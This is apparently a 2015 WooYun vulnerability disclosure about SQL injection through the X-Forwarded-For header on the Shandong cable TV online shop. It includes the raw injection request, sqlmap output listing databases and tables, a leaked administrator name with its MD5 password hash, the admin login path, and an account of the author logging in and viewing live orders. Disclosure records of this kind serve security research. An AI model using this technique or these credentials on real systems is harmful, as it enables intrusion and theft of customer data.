当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137679

漏洞标题:山东广电有线商城注入/后台数据沦陷

相关厂商:山东有线广电商城

漏洞作者: water

提交时间:2015-08-31 22:47

修复时间:2015-10-17 09:54

公开时间:2015-10-17 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

RT

详细说明:

山东有线广电商城,经检测,大部分页面存在X-Forwarded-For注入
详情如下,注入点随便找一个页面Cart1.asp
然后抓去请求包

GET /Cart1.asp?MsgShow=OK HTTP/1.1
X-Forwarded-For: 999*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: **.**.**.**
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)


可以利用神器sqlmap进行注入

漏洞证明:

这里只粘一部分结果

available databases [5]:
[*] master
[*] model
[*] msdb
[*] qj_jnncshopok
[*] tempdb
Database: qj_jnncshopok
[136 tables]
+-----------------------------------+
| Lodo_BankAccountSet |
| Lodo_BluntValue |
| Lodo_Brand |
| Lodo_ButtomHelp |
| Lodo_CGoods |
| Lodo_Comment |
| Lodo_CommoditiesClass |
| Lodo_DBook |
| Lodo_Generalize |
| Lodo_Gift |
| Lodo_GoodsSell |
| Lodo_GoodsTypeAnalyze |
| Lodo_GoodsVisit |
| Lodo_HelpClass |
| Lodo_HelpTitle |
| Lodo_IPBanList |
| Lodo_Identify |
| Lodo_KWD |
| Lodo_KeyWords |
| Lodo_Links |
| Lodo_MailBack |
| Lodo_MailBack |
| Lodo_MailSend |
| Lodo_Mask |
| Lodo_MemberLevel |


里面有Lodo_adminuser表,
测试后得到管理员账户名密码

超级管理员     | adminok   |
96130A1FE963F12F1FF437F97F462F5C |


解密可得到密码MD5值,解密这里就不说了
写下来找寻后台,有点费劲,但还是找到了

http://**.**.**.**/adminjnncshopok/login.asp


然后用上面用户名密码登陆
结果如下图

1212.png


然后订单可以看到,(今天还在交易)

1313.png


整个后台信息还是不少的。
然后后台数据库打包,发现数据库下载需要密钥,然后就没有然后了。

修复方案:

这个系统就是有问题,可以考虑换系统了

版权声明:转载请注明来源 water@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-02 09:53

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论